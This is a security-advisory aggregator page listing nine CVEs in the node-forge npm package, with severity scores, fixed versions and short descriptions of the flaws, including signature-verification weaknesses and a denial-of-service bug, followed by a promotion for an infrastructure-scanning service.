node-forge
npm9 known CVEs affecting this package
Aggregated from OSV, GitHub Security Advisories, NVD, and vendor advisories. Each CVE links to its full detail page with vendor advisories, patches, fixed versions, and remediation guidance.
CVEs affecting node-forgepage 1 of 1
- CVE-2020-7720CRITICALCVSS 9.8EG 9.8✓ Fixed in 0.10.02020-09-01
The package node-forge before 0.10.0 is vulnerable to Prototype Pollution via the util.setPath function. Note: Version 0.10.0 is a breaking change removing the vulnerable functions.
- CVE-2022-0122MEDIUMCVSS 6.1EG 6.1✓ Fixed in 1.0.02022-01-06
forge is vulnerable to URL Redirection to Untrusted Site
- CVE-2022-24771HIGHCVSS 7.5EG 7.5✓ Fixed in 1.3.02022-03-18
Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code is lenient in checking the digest algorithm structure. This can allo…
- CVE-2022-24772HIGHCVSS 7.5EG 7.5✓ Fixed in 1.3.02022-03-18
Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code does not check for tailing garbage bytes after decoding a `DigestInf…
- CVE-2022-24773MEDIUMCVSS 5.3EG 5.3✓ Fixed in 1.3.02022-03-18
Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code does not properly check `DigestInfo` for a proper ASN.1 structure. T…
- CVE-2026-33891HIGHCVSS 7.5EG 7.5✓ Fixed in 1.4.02026-03-27
Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, a Denial of Service (DoS) vulnerability exists in the node-forge library due to an infinite loop in the BigInteg…
- CVE-2026-33894HIGHCVSS 7.5EG 7.5✓ Fixed in 1.4.02026-03-27
Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, RSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low public exponent keys (e=3). Attacker…
- CVE-2026-33895HIGHCVSS 7.5EG 7.5✓ Fixed in 1.4.02026-03-27
Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, Ed25519 signature verification accepts forged non-canonical signatures where the scalar S is not reduced modulo …
- CVE-2026-33896HIGHCVSS 7.4EG 7.4✓ Fixed in 1.4.02026-03-27
Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, `pki.verifyCertificateChain()` does not enforce RFC 5280 basicConstraints requirements when an intermediate cert…
Check whether node-forge is used in your infrastructure
EchelonGraph scans your cloud and SBOMs to map every package to your actual deployments. See blast radius for node-forge CVEs against the assets you own.
Start Free Scan →